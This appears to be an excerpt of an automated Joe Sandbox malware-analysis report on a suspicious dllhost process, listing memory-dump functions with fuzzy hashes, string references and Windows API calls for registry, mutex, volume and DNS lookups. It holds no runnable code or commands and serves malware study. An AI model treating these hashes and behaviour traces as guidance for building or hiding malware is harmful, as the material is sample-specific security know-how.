Instruction Fuzzy Hash: 3151FB74A04608CFDB14EFA4ED987ACBBB1FF45309F104A65E90AD7261EB746A44CF12

Function 0485E366 Relevance: 2.6, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: be4cc14e7424bb30b9025462ed76bc4faf490ad130e35b1ef7221a717cb371a8
Instruction ID: e037c74380666dc2116a0ad6a25d0195a5e7c79fb08972d23cc7aa41c74b7dbc
Opcode Fuzzy Hash: be4cc14e7424bb30b9025462ed76bc4faf490ad130e35b1ef7221a717cb371a8
Instruction Fuzzy Hash: 0A51FE74A04608CFDB54DF74DD887ACBBB2FB45309F104965E80AD7261EB746A84CF12

Function 0485E43C Relevance: 2.6, Strings: 2, Instructions: 131COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: 114cba6a7745e4333ef634391c94bb31c01c2562f23fa5ddb31133fac6903fef
Instruction ID: 2ed530d3d094c6f24ff33c3bb67675eddad3a2f86265a11eb04e8c47ed48c0e1
Opcode Fuzzy Hash: 114cba6a7745e4333ef634391c94bb31c01c2562f23fa5ddb31133fac6903fef
Instruction Fuzzy Hash: 0951FD74A04608CFDB14EFB4ED987ACBBB2BF45319F104965E80AD7261EB746A44CF12

Function 0485E414 Relevance: 2.6, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: f46ff13187897b3afa473fefb7b0fb4dba583d3e95d13b218f79c82a3f667392
Instruction ID: 25f3ddb0fa3fec8df66f4de820d079365d42bdba72e5e1aa959a18b6e74c1f1d
Opcode Fuzzy Hash: f46ff13187897b3afa473fefb7b0fb4dba583d3e95d13b218f79c82a3f667392
Instruction Fuzzy Hash: D051FD74A04608CFDB14EFB4ED887ACBBB1BF45359F104965E80AD7261EB746A44CF12

Function 0485E4CB Relevance: 2.6, Strings: 2, Instructions: 129COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: 94ba53ed0284237fa869beb524932e7471c6c87b8bd29d1f9d0cb71e2cc95fb4
Instruction ID: 9c046bbc6fea8bc96d4259e04a56ecb38b25dcecebf9b3df626f9589c9f2091e
Opcode Fuzzy Hash: 94ba53ed0284237fa869beb524932e7471c6c87b8bd29d1f9d0cb71e2cc95fb4
Instruction Fuzzy Hash: FB510C74A04608CFDB14DFA4DC887ACBBB1FF45319F104969E80AD7261EB746A84CF12

Function 0485E4F2 Relevance: 2.6, Strings: 2, Instructions: 127COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: f9f4316ec4eb1ba4e33cd2f64bc9aaafd1a66f73f69913ab42f7375205e9d41c
Instruction ID: 7736adef2ccb2bbb03d090e01317ce886f49b220b97a319641489fae612c8db1
Opcode Fuzzy Hash: f9f4316ec4eb1ba4e33cd2f64bc9aaafd1a66f73f69913ab42f7375205e9d41c
Instruction Fuzzy Hash: D1512D74A04608CFDB14DFB4EC887ADBBB1BF45309F104965E80AD7261EB706A84CF12

Function 0485E633 Relevance: 2.6, Strings: 2, Instructions: 127COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: fe405cbebbe998d29151e9fa2fd2390bc00c4057fec4ebc015e4e47160884e62
Instruction ID: 6e146c37900fcc6dd5cdf8421664a711aeb4e555c6bb2201128f2d3321935696
Opcode Fuzzy Hash: fe405cbebbe998d29151e9fa2fd2390bc00c4057fec4ebc015e4e47160884e62
Instruction Fuzzy Hash: 9D51FC74A04608CFDB14EFA4ED987ACBBB1BB45349F104965E80AD7261EB746A44CF12

Function 0485E3C4 Relevance: 2.6, Strings: 2, Instructions: 127COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: 4a6916a0e937bc832bf7c923cd12baca460c980d55e86e1a786ee7c82cdea2ba
Instruction ID: d7a2c7a35df00d135b177573a09f0f7e5ac859d9c848272329fac04ed4f1aa16
Opcode Fuzzy Hash: 4a6916a0e937bc832bf7c923cd12baca460c980d55e86e1a786ee7c82cdea2ba
Instruction Fuzzy Hash: F0510D74A04609CFDB14DFB4ED987ACBBB1BF45309F104969E80AD7261EB746A84CF12

Function 0485E3F1 Relevance: 2.6, Strings: 2, Instructions: 127COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: 16b42667dd039f0dc6b495100ad2c521ed86c0a75fd44ae71a14556ba87e5dcd
Instruction ID: 61a74938a8c728fbf9d6bcb884bd0e921c3d3175121a0265b08c77be88f3aefe
Opcode Fuzzy Hash: 16b42667dd039f0dc6b495100ad2c521ed86c0a75fd44ae71a14556ba87e5dcd
Instruction Fuzzy Hash: 3F511E74A04608CFDB14EFB4EC887ACBBB2BF45309F104965E80AD7260EB706A44CF52

Function 0485E4E3 Relevance: 2.6, Strings: 2, Instructions: 125COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: 67851d46702f3bc94185c38aeff11da200640eafd02d339b2a097ff96acd13c1
Instruction ID: 353ce2e232caa6a4e4a82db021e9610f3b30ad582946c82f2bc4c84124df7263
Opcode Fuzzy Hash: 67851d46702f3bc94185c38aeff11da200640eafd02d339b2a097ff96acd13c1
Instruction Fuzzy Hash: 2451FC74A04608CBDB14DFA4DD887ADBBB2BF45319F104965E80AD7261EB746A44CF12

Function 0485E67B Relevance: 2.6, Strings: 2, Instructions: 125COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: 3adadaabc2ac9d715e132a5df475c0e3079a3e1b1922226d94e85d8b6745fa8d
Instruction ID: bb95a8bc9cfed390a78b885cd6f90b7976e97bbafc5f248a52279c362df1cd3e
Opcode Fuzzy Hash: 3adadaabc2ac9d715e132a5df475c0e3079a3e1b1922226d94e85d8b6745fa8d
Instruction Fuzzy Hash: 9D511C74A04608CFEB14DFB4EC887BCBBB2BB45349F104965E80AD7261EB746A44CF12

Function 0485E3AE Relevance: 2.6, Strings: 2, Instructions: 125COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: 266e4219e4b80197ddced865e0ccf5e305968740caa0644c23ae4aaca5b77152
Instruction ID: 432d4c5f73c7ee6557639cd24b320b929a4b8dcdcbff0a180714ce7f4282b1aa
Opcode Fuzzy Hash: 266e4219e4b80197ddced865e0ccf5e305968740caa0644c23ae4aaca5b77152
Instruction Fuzzy Hash: 8851FD74A04608CFDB14DFB4ED987ACBBB1BB45319F104965E80AD7261EB746A44CF12

Function 0485E3DC Relevance: 2.6, Strings: 2, Instructions: 125COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: 0f363d0e8ef18778224c2d614618557a5787b4572f1e07073a93d707b3da9938
Instruction ID: 22515bd6b2cafed4024dd3911b5f7ab3664c618d7de6f8b329f2301b1175f81c
Opcode Fuzzy Hash: 0f363d0e8ef18778224c2d614618557a5787b4572f1e07073a93d707b3da9938
Instruction Fuzzy Hash: A651FD74A04608CFDB14DFB4ED887ACBBB1BF45319F104969E80AD7261EB746A44CF52

Function 0485E469 Relevance: 2.6, Strings: 2, Instructions: 124COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: d7a48f7672b5753db6faa9bcf5dfa9f82cab6fd7e74132182f0a36272437c154
Instruction ID: 471856ea7581caee096430683f0fddee2cae64b0eeff11cc8914779d6f87a7b9
Opcode Fuzzy Hash: d7a48f7672b5753db6faa9bcf5dfa9f82cab6fd7e74132182f0a36272437c154
Instruction Fuzzy Hash: 66510D74A04608CFDB14DFA4EC887ACBBB1BF45309F104965E80AD7261EB746A44CF12

Function 0485E512 Relevance: 2.6, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

!, xrefs: 0485E546
2|l, xrefs: 0485E335

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: !$2|l
API String ID: 0-300952204
Opcode ID: c66b42e35a5df91f00e84bdd9879c9111b91b227d33aabe434e2495fd3b91628
Instruction ID: c9e15b757c66f71c968ed27e710ea3c8f1eac6fb1ca0291c72c5390f91724540
Opcode Fuzzy Hash: c66b42e35a5df91f00e84bdd9879c9111b91b227d33aabe434e2495fd3b91628
Instruction Fuzzy Hash: C6510C74A04608CFDB14DFA4ED887BDBBB2BB45319F104965E80AD7261EB746A84CF12

Function 04BC1937 Relevance: 2.6, Strings: 2, Instructions: 94COMMON

Download Yara Rule

Strings

:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul
API String ID: 0-584387997
Opcode ID: 1e744bb8ec6846f649394716b283e6e4eea311798cab6f38d2d4804c70944e26
Instruction ID: 7d0a1ee8161b9fc6a04c8f567be610529d10451f9503c50f4ba9750220366776
Opcode Fuzzy Hash: 1e744bb8ec6846f649394716b283e6e4eea311798cab6f38d2d4804c70944e26
Instruction Fuzzy Hash: 6F413874A002189BEB64DF28CD997ED77B2FF85304F4040A9990AAB395DF709E81CF51

Function 04BC1579 Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul
API String ID: 0-584387997
Opcode ID: e6f9abe93d4a002a2ce33eddf7d55f3f7b36332828baeac2c2867429a54cf976
Instruction ID: 78619614ae2ee7b87f4fb042f0971ccc3eb0ea27e3381987bedaf620ef187e93
Opcode Fuzzy Hash: e6f9abe93d4a002a2ce33eddf7d55f3f7b36332828baeac2c2867429a54cf976
Instruction Fuzzy Hash: B8310974A00228CBEB64DF68CD997AD77B2FB85304F4080A9990EAB395DF749D81CF51

Function 04850080 Relevance: 2.6, Strings: 2, Instructions: 73COMMON

Download Yara Rule

Strings

dS|l, xrefs: 048501B9
:@Ul, xrefs: 04850100

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: a5fc7c1d74634a57187ce18ada1ba00dd5a812db3ed14a34fb93400145ffdac4
Instruction ID: 1e1fccde73b2239e9947b26e9bbbc64688fc691a49d6e1169544f2a0208309e7
Opcode Fuzzy Hash: a5fc7c1d74634a57187ce18ada1ba00dd5a812db3ed14a34fb93400145ffdac4
Instruction Fuzzy Hash: DC318F785007918BD308EB3AEA46358BBE2BFD6308F54C53DC5048B269EFB15619CB82

Function 04850090 Relevance: 2.6, Strings: 2, Instructions: 69COMMON

Download Yara Rule

Strings

dS|l, xrefs: 048501B9
:@Ul, xrefs: 04850100

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$dS|l
API String ID: 0-1394735054
Opcode ID: 6adc55d3e357f4fe0cadd90216d05a98f618395b349839d1d37fe25e5b912fcd
Instruction ID: 4dff3be93ee47ac01ba6315b27e3ea1eec0584772bd00b04e96801660d028f14
Opcode Fuzzy Hash: 6adc55d3e357f4fe0cadd90216d05a98f618395b349839d1d37fe25e5b912fcd
Instruction Fuzzy Hash: B0214C385006518BD308EB7AEA46359BBE2BFD6708F54C539C5048B268EFB16619CB82

Function 04BC1485 Relevance: 2.6, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul
API String ID: 0-584387997
Opcode ID: d9259c02a7d7712831b8d96ae823732fe7c50332bbdf1e43518baee805c8e3f6
Instruction ID: af8d1d38c0379bee42e0fe7bb4d23ce203121cd86ee1bb342995b277e7d55f48
Opcode Fuzzy Hash: d9259c02a7d7712831b8d96ae823732fe7c50332bbdf1e43518baee805c8e3f6
Instruction Fuzzy Hash: B0213E74A002188BDB54DF64DC987ED77B2BB89300F4044AA990AAB395DF745D81CF01

Function 04BC1431 Relevance: 2.6, Strings: 2, Instructions: 59COMMON

Download Yara Rule

Strings

:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul
API String ID: 0-584387997
Opcode ID: b327bfda39381f64bb984a89da6bfa74c3042a26e0dc3141432e0cc1c2363a58
Instruction ID: a83498c980a74d123211641e5c8b1a235bdddd90825d17a21e206fceec0b8512
Opcode Fuzzy Hash: b327bfda39381f64bb984a89da6bfa74c3042a26e0dc3141432e0cc1c2363a58
Instruction Fuzzy Hash: 29213C74A00218CBDB58DF68CD997ED77B2FB89300F0040AAAA4AAB295CF745D81DF11

Function 04BC1463 Relevance: 2.6, Strings: 2, Instructions: 56COMMON

Download Yara Rule

Strings

:@Ul, xrefs: 04BC1700
:@Ul, xrefs: 04BC1832

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: :@Ul$:@Ul
API String ID: 0-584387997
Opcode ID: 2fc372cad63763303f85cb69cc05d51be699c76d715d1457dbad910d32fc3e22
Instruction ID: 29975ab00b4e9bc85bc0dc404a462ed03715419b6b72a1beaccf52b3395e4825
Opcode Fuzzy Hash: 2fc372cad63763303f85cb69cc05d51be699c76d715d1457dbad910d32fc3e22
Instruction Fuzzy Hash: A1213878A04218CBEB54DF64DC987ED77B2FB89300F1080A9A94AAB695CF745D81CF11

Function 0485DE11 Relevance: 2.6, Strings: 2, Instructions: 51COMMON

Download Yara Rule

Strings

\B|l, xrefs: 0485DE85
\B|l, xrefs: 0485DE48

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID: \B|l$\B|l
API String ID: 0-1277390299
Opcode ID: 113126bb8dc8d58019e2662ba9dd211c9f5002716b27b4489e03b211a3720cf0
Instruction ID: 4fb875c439ec066a55614acd50f233d7a0022910c9e6bf94d5f8b5745210e982
Opcode Fuzzy Hash: 113126bb8dc8d58019e2662ba9dd211c9f5002716b27b4489e03b211a3720cf0
Instruction Fuzzy Hash: AB114C30E04209CFCB14CFA8D9486EDBBF1AF59204F5085BAD805E7661E3316E01CB51

Function 04BC0A46 Relevance: 2.5, Strings: 2, Instructions: 16COMMON

Download Yara Rule

Strings

E, xrefs: 04BC0A49
5, xrefs: 04BC0A6C

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: 5$E
API String ID: 0-717204176
Opcode ID: 3475b0eaeba45bca00918d60161cf156ea1552202184e56fbdc8e8bd0002d2d3
Instruction ID: 7c6f5345fab3edea818073591a94ce48dd3207a620ed1185d735fb5414e1100f
Opcode Fuzzy Hash: 3475b0eaeba45bca00918d60161cf156ea1552202184e56fbdc8e8bd0002d2d3
Instruction Fuzzy Hash: 52D05E7090624ACFCB419FA0985919C7BB4FF01315B44474E84019E29ADA3D4525DB01

Function 04BC0140 Relevance: 2.5, Strings: 2, Instructions: 15COMMON

Download Yara Rule

Strings

/, xrefs: 04BC065E
B, xrefs: 04BC0144

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID: /$B
API String ID: 0-2775194069
Opcode ID: 2cb5ece9802148969ed515fad6ee77783194fa86d1603aabb8274f329e6d0abc
Instruction ID: 264550b77bb9a39ae4077be62ddde10506a99cdf026e32fa608a38be583bb593
Opcode Fuzzy Hash: 2cb5ece9802148969ed515fad6ee77783194fa86d1603aabb8274f329e6d0abc
Instruction Fuzzy Hash: 84D05B64A06245DBDB41AFE085583687FB5AF01200F4445E9D54AAF2D7E93C54009716

Function 06863742 Relevance: 1.6, APIs: 1, Instructions: 111registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNEL32(?,00000E24), ref: 06863815

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 5da853f37ceff7e67420edb6711fd809897b845fb73d117fa2a2c6ebff7ac02d
Instruction ID: 02fb726f8bc62f39d0f20de87e2193d1a21b483f6fb7c25af5e9d24a45d88c95
Opcode Fuzzy Hash: 5da853f37ceff7e67420edb6711fd809897b845fb73d117fa2a2c6ebff7ac02d
Instruction Fuzzy Hash: B031A2B6504744AFEB228B21DC44F67BFFCEF05614F09449AFA84DB562D220E509CB71

Function 0083B72C Relevance: 1.6, APIs: 1, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 0083B7E9

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 23fc457965123e7fc13bd98aa424df6d1f4e69f3d40af5ca0718245e565d9baf
Instruction ID: 4b061f4c7d1c0f16540a0292c7501ef9b074baa2d91f2b2034635811753db177
Opcode Fuzzy Hash: 23fc457965123e7fc13bd98aa424df6d1f4e69f3d40af5ca0718245e565d9baf
Instruction Fuzzy Hash: DE31E6B64043446FE7228B51DC45FA6BFBCEF45320F05849AEA448B152D374A909C7B1

Function 0083A793 Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0083A849

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0208b9a622a88aed81380a671672b2d6a06be391243cff20038e1a81d24455c1
Instruction ID: 1245de76ae4c7f1c20ea8912bb2f7eff83fde8a6cc369af4ea39cf9badd3830f
Opcode Fuzzy Hash: 0208b9a622a88aed81380a671672b2d6a06be391243cff20038e1a81d24455c1
Instruction Fuzzy Hash: BA3181B55053806FE722CB25CD45B62BFF8EF46314F08849EE9858B152D375A909CB72

Function 0686139B Relevance: 1.6, APIs: 1, Instructions: 98registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,?,?), ref: 06861462

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 406fdb074baa92bc8ae67a65a0604cc41706e6cc5666cb5e2c85df92227e0dc9
Instruction ID: 673b82be65b54cd484d6c77e8bdfb4da7c8a1f710dbdd4dfa1a2f3031c93f024
Opcode Fuzzy Hash: 406fdb074baa92bc8ae67a65a0604cc41706e6cc5666cb5e2c85df92227e0dc9
Instruction Fuzzy Hash: 12319E6550E3C06FD3138B258C65A61BFB4EF47610F0E45CBE8C48F6A3D229A919C7B2

Function 06861FC8 Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E24), ref: 0686208F

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 57250cb467c94a63cff975c89339cd1daf5dd38f31b4b8f15dffe751cf5d639b
Instruction ID: 49e754a8c8ef82a80275fd855d4cd1f7881653ef6683e551b3b73d0999f9da70
Opcode Fuzzy Hash: 57250cb467c94a63cff975c89339cd1daf5dd38f31b4b8f15dffe751cf5d639b
Instruction Fuzzy Hash: 8831B1B2504344AFE721CB51DC45FA7FBACEB04714F04489AFA489B192D3B5A948CB71

Function 06862256 Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,00000E24,?,?), ref: 06862316

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: 628609d6f627060db8b6db4cfd86864cdaa08bc4993ff2c57d2ad19072189931
Instruction ID: 4e9b3a2ccad4a5c0e9418fe384e104798a591f5c7dbbdc0e9eeeb4733ab7efd8
Opcode Fuzzy Hash: 628609d6f627060db8b6db4cfd86864cdaa08bc4993ff2c57d2ad19072189931
Instruction Fuzzy Hash: F131607150D3C06FD3138B258C61B62BFB8AF47610F1D41DBD8C49F5A3D2256959C7A2

Function 0083B62E Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 0083B6D5

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 588201821fd585f53f5534161986580a30305b4c34b0c2c5d2bcbe133e12c2ed
Instruction ID: 4cd1738b51cf85dbe1d06eed20ff17049833c0a10a9fdde3d240a07cb0875e2d
Opcode Fuzzy Hash: 588201821fd585f53f5534161986580a30305b4c34b0c2c5d2bcbe133e12c2ed
Instruction Fuzzy Hash: 94318FB55093806FE711CB65CC85B66FFF8EF46310F09849AE944CB293E375A909C762

Function 068618B4 Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 0686194B

Memory Dump Source

Source File: 00000002.00000002.3880095256.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6860000_dllhost.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: f1da569cd60b041ca0688ec7e199fb5d18dbddd6c4c2598edcad568df38ffa1c
Instruction ID: 3ff12fc62da5a81fb1ec058e5469e1f1539ac3d6aaf5c29a1396478ce569b9d2
Opcode Fuzzy Hash: f1da569cd60b041ca0688ec7e199fb5d18dbddd6c4c2598edcad568df38ffa1c
Instruction Fuzzy Hash: 6F318076508344AFE721CB65DC45F6BBBA8EF05214F09849AF984DB152D364A809CB61

Function 0083B831 Relevance: 1.6, APIs: 1, Instructions: 86windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(?,00000E24), ref: 0083B8ED

Memory Dump Source

Source File: 00000002.00000002.3863325888.000000000083A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0083A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_83a000_dllhost.jbxd

Similarity

API ID: MessageSendTimeout
String ID:
API String ID: 1599653421-0
Opcode ID: e17af4163391c00c3e851a98b833c3c21f6ce316e40d39a719dc0b3356e4248d
